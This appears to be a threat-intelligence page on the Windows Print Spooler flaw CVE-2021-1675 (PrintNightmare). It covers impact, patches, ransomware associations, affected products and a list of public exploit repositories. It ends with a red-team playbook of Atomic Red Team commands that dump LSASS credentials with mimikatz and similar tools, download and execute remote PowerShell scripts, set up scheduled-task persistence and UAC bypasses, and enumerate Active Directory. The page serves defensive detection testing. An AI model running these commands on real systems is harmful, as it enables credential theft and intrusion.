CVE-2021-1675
Overview
This vulnerability is a remote code execution flaw rooted in improper access control within the Windows Print Spooler service. The flaw arises from the Print Spooler's failure to correctly validate privileged operations, allowing unauthorized remote interactions with the spooler’s internal interfaces. Specifically, the vulnerability affects the Print Spooler component responsible for managing print jobs and printer drivers on affected Windows 10 versions.
Vulnerability Description
Windows Print Spooler Remote Code Execution Vulnerability
Impact
An attacker with network access to the Print Spooler service can execute arbitrary code remotely with SYSTEM privileges without requiring user interaction or authentication. This enables full system compromise, including installation of persistent malware, data exfiltration, and lateral movement within a network. The vulnerability can be exploited by a low-privileged attacker or an unauthenticated remote adversary, significantly increasing the risk of widespread compromise in enterprise environments.
Solution
Microsoft has released security updates addressing this vulnerability for Windows 10 versions 1507 through 2004, detailed in the Microsoft Security Advisory available at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1675. Administrators should apply the latest cumulative updates for Windows 10 Version 1809 and other affected versions. As a temporary mitigation, disabling the Print Spooler service on systems where it is not required is recommended until patches are applied.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
blackbasta
|
523 | ransomware.live |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Vice Society
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The Windows Print Spooler service, a critical component of the Windows operating system, has been identified as having a remote code execution vulnerability that allows attackers to execute arbitrary code on affected systems. This vulnerability arises from improper handling of requests, which can be exploited by sending specially crafted print requests to the Print Spooler service. The flaw can lead to a situation where an attacker gains the same privileges as the user running the Print Spooler service, potentially allowing them to install programs, view, change, or delete data, and create new accounts with full user rights.
Attack vectors for this vulnerability are particularly concerning due to the service's default configuration, which is often enabled on systems, including servers and client machines. Attackers can exploit this vulnerability over a network, making it possible to target systems remotely without requiring physical access. Scenarios may include an attacker sending malicious print jobs to the Print Spooler service on a vulnerable machine, which could lead to the execution of arbitrary code. Additionally, this vulnerability can be exploited in conjunction with other vulnerabilities or social engineering tactics, further increasing the risk of compromise.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Windows environments for their operations. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential financial losses due to downtime or data breaches. The business risk is compounded by the fact that many organizations may not have adequate security measures in place to detect or prevent such attacks, making them prime targets for cybercriminals. Furthermore, the potential for lateral movement within a network increases the threat landscape, as attackers could leverage compromised machines to access other critical systems.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as software vendors often release security updates to address known vulnerabilities. Additionally, organizations should consider disabling the Print Spooler service on systems where it is not necessary, thereby reducing the attack surface. Employing network segmentation can also help contain potential breaches by limiting the ability of attackers to move laterally within the network. Monitoring for unusual print job activity and implementing intrusion detection systems can further enhance an organization’s ability to detect and respond to exploitation attempts.
In conclusion, the remote code execution vulnerability within the Windows Print Spooler service poses a serious threat to both individual users and organizations. Given the ease of exploitation and the potential for significant impact, it is imperative that organizations take proactive measures to secure their systems. By understanding the technical details, potential attack vectors, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities in the future.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-1675, coinciding with the emergence of new proof-of-concept exploits publicly available on multiple platforms. This increased activity underscores the vulnerability’s continued attractiveness to threat actors, particularly ransomware groups such as Black Basta and Vice Society, which maintain high-confidence associations with campaigns leveraging this flaw. Although the EPSS score remains stable at a high level, the surge in telemetry signals a growing operationalization of the vulnerability in the wild. For defenders, this shift elevates the urgency to monitor for exploitation indicators closely, as adversaries are actively integrating these techniques into their toolkits. Consequently, the threat level associated with CVE-2021-1675 has intensified from a theoretical risk to a more imminent and tangible danger, reflecting its sustained exploitation viability and ransomware linkage.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-1675, accompanied by the emergence of additional ransomware groups leveraging this vulnerability. Our telemetry indicates that adversaries are increasingly incorporating new proof-of-concept exploits into their operational toolkits, broadening the exploit landscape beyond previously known implementations. This expansion reflects a shift from opportunistic scanning to more deliberate and sustained exploitation campaigns, particularly by ransomware actors such as Blackbasta and Vice Society, whose involvement has grown. The increased diversity of threat actors and exploitation methods elevates the complexity and persistence of attacks, underscoring a heightened risk to affected Windows 10 Version 1809 environments. Consequently, the threat level associated with CVE-2021-1675 has intensified, moving from a high-severity concern to a more imminent and active threat that demands vigilant monitoring and response.
Affected Products (17)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1507 | All |
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1607 | All |
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1909 | All |
cpe:2.3:o:microsoft:windows_10_1909:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 2004 | All |
cpe:2.3:o:microsoft:windows_10_2004:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 20h2 | All |
cpe:2.3:o:microsoft:windows_10_20h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 21h1 | All |
cpe:2.3:o:microsoft:windows_10_21h1:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 7 | N/A |
cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
|
|
|
Microsoft | Windows 8.1 | N/A |
cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Rt 8.1 | N/A |
cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2004 | All |
cpe:2.3:o:microsoft:windows_server_2004:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | N/A |
cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | r2 |
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2012 | N/A |
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2012 | r2 |
cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2016 | All |
cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2019 | All |
cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Print Spooler Remote DLL Injection
exploits/windows/dcerpc/cve_2021_1675_printnightmare
|
Zhiniang Peng, Xuefeng Li, Zhipeng Huo +5 | Unknown | - | View |
GitHub PoCs (48)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
cube0x0/CVE-2021-1675
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
|
cube0x0 | 1993 | 577 | 2021-06-29 | View |
|
calebstewart/CVE-2021-1675
Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
|
calebstewart | 1099 | 225 | 2021-07-01 | View |
|
hlldz/CVE-2021-1675-LPE
Local Privilege Escalation Edition for CVE-2021-1675/CVE-2021-34527
|
hlldz | 325 | 76 | 2021-07-01 | View |
|
LaresLLC/CVE-2021-1675
CVE-2021-1675 Detection Info
|
LaresLLC | 214 | 38 | 2021-06-30 | View |
|
ly4k/PrintNightmare
Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
|
ly4k | 210 | 32 | 2021-09-26 | View |
|
mstxq17/CVE-2021-1675_RDL_LPE
PrintNightMare LPE提权漏洞的CS 反射加载插件。开箱即用、通过内存加载、混淆加载的驱动名称来ByPass Defender/EDR。
|
mstxq17 | 145 | 20 | 2021-09-01 | View |
|
sailay1996/PrintNightmare-LPE
CVE-2021-1675 (PrintNightmare)
|
sailay1996 | 77 | 27 | 2021-07-05 | View |
|
evilashz/CVE-2021-1675-LPE-EXP
PrintNightmare , Local Privilege Escalation of CVE-2021-1675 or CVE-2021-34527
|
evilashz | 56 | 18 | 2021-07-01 | View |
|
cybersecurityworks553/CVE-2021-1675_PrintNightMare
|
cybersecurityworks553 | 23 | 14 | 2021-07-01 | View |
|
JumpsecLabs/PrintNightmare
Information on the Windows Spooler vulnerability - CVE-2021-1675; CVE 2021 34527
|
JumpsecLabs | 19 | 8 | 2021-07-07 | View |
|
eversinc33/NimNightmare
CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)
|
eversinc33 | 18 | 5 | 2021-12-05 | View |
|
Wra7h/SharpPN
C# PrintNightmare (CVE-2021-1675)
|
Wra7h | 9 | 9 | 2021-09-26 | View |
|
k8gege/cve-2021-1675
|
k8gege | 15 | 3 | 2021-07-11 | View |
|
corelight/CVE-2021-1675
|
corelight | 9 | 4 | 2021-07-02 | View |
|
Leonidus0x10/CVE-2021-1675-SCANNER
Vulnerability Scanner for CVE-2021-1675/PrintNightmare
|
Leonidus0x10 | 9 | 3 | 2021-07-02 | View |
|
exploitblizzard/PrintNightmare-CVE-2021-1675
Youtube : https://youtu.be/Zr0KjYDSFKQ
|
exploitblizzard | 5 | 2 | 2021-07-04 | View |
|
hahaleyile/my-CVE-2021-1675
see https://github.com/cube0x0/CVE-2021-1675
|
hahaleyile | 3 | 3 | 2021-07-22 | View |
|
puckiestyle/CVE-2021-1675
|
puckiestyle | 1 | 5 | 2021-07-01 | View |
|
thomasgeens/CVE-2021-1675
|
thomasgeens | 3 | 2 | 2021-07-02 | View |
|
kondah/patch-cve-2021-1675
|
kondah | 2 | 2 | 2021-06-30 | View |
|
OppressionBreedsResistance/CVE-2021-1675-PrintNightmare
Working PowerShell POC
|
OppressionBreedsResistance | 1 | 3 | 2021-10-05 | View |
|
yu2u/CVE-2021-1675
CVE-2021-1675 exploit
|
yu2u | 2 | 1 | 2021-06-29 | View |
|
killtr0/CVE-2021-1675-PrintNightmare
|
killtr0 | 2 | 1 | 2021-07-02 | View |
|
ozergoker/PrintNightmare
Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmare)
|
ozergoker | 2 | 1 | 2021-07-03 | View |
|
bartimusprimed/CVE-2021-1675-Yara
|
bartimusprimed | 2 | 1 | 2021-07-08 | View |
|
tanarchytan/CVE-2021-1675
Fix without disabling Print Spooler
|
tanarchytan | 0 | 3 | 2021-07-01 | View |
|
Winter3un/CVE-2021-1675
|
Winter3un | 1 | 1 | 2021-07-20 | View |
|
zha0/Microsoft-CVE-2021-1675
|
zha0 | 0 | 2 | 2021-07-18 | View |
|
edsonjt81/CVE-2021-1675
|
edsonjt81 | 0 | 1 | 2021-07-05 | View |
|
peckre/PNCVE-Win10-20H2-Exploit
A one-click script to gain a System privileges command line in Windows 10 20H2 that exploits CVE-2021-1675
|
peckre | 1 | 0 | 2024-01-17 | View |
|
whoami-chmod777/CVE-2021-1675-CVE-2021-34527
|
whoami-chmod777 | 1 | 0 | 2024-02-12 | View |
|
DLL00P/CVE-2021-1675
|
DLL00P | 1 | 0 | 2025-07-29 | View |
|
kougyokugentou/CVE-2021-1675
A small powershell script to disable print spooler service using desired state configuration
|
kougyokugentou | 0 | 1 | 2021-07-02 | View |
|
ptter23/CVE-2021-1675
CVE-2021-1675: ZERO-DAY VULNERABILITY IN WINDOWS PRINTER SERVICE WITH AN EXPLOIT AVAILABLE IN ALL OPERATING SYSTEM VERSI...
|
ptter23 | 0 | 1 | 2021-07-02 | View |
|
mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery
|
mrezqi | 0 | 1 | 2021-07-02 | View |
|
ccordeiro/CVE-2021-1675
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
|
ccordeiro | 0 | 1 | 2025-11-19 | View |
|
initconf/cve-2021-1675-printnightmare
to catch cve-2021-1675-printnightmare
|
initconf | 0 | 1 | 2021-07-03 | View |
|
thalpius/microsoft-cve-2021-1675
|
thalpius | 0 | 0 | 2021-07-16 | View |
|
VoiidByte/Impacket
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
|
VoiidByte | 0 | 0 | 2025-08-24 | View |
|
thalpius/Microsoft-CVE-2021-1675
|
thalpius | 0 | 0 | 2021-07-16 | View |
|
galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527
CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python, C# and PowerShell Exploits Implementations (LPE & RCE)
|
galoget | 0 | 0 | 2021-07-12 | View |
|
r1skkam/PrintNightmare
Learn about the vulnerability known as PrintNightmare (CVE-2021-1675) and (CVE-2021-34527)
|
r1skkam | 0 | 0 | 2022-12-28 | View |
|
000Tonio/cve-2021-1675
|
000Tonio | 0 | 0 | 2023-10-19 | View |
|
Sp4ceDogy/NPE-CS-V-CVE-2021-1675
|
Sp4ceDogy | 0 | 0 | 2025-03-10 | View |
|
CameraShutterBug/PrintNightmare
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
|
CameraShutterBug | 0 | 0 | 2025-07-24 | View |
|
GlacierGossip/PrintNightmare
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
|
GlacierGossip | 0 | 0 | 2025-08-05 | View |
|
whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-
|
whoami-chmod777 | 0 | 0 | 2024-02-12 | View |
|
0xSs0rZ/Windows_Exploit
CVE-2021-1675/CVE-2021-34527 PrintNightmare & CVE-2020-0668
|
0xSs0rZ | 0 | 0 | 2024-06-05 | View |
Ransomware Groups 2
Threat Feed
25 eventsSighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Cobalt Strike, FileZilla, PsExec (36 known victims)
Ransomware group known to exploit this vulnerability (26 known victims)
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability (62 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
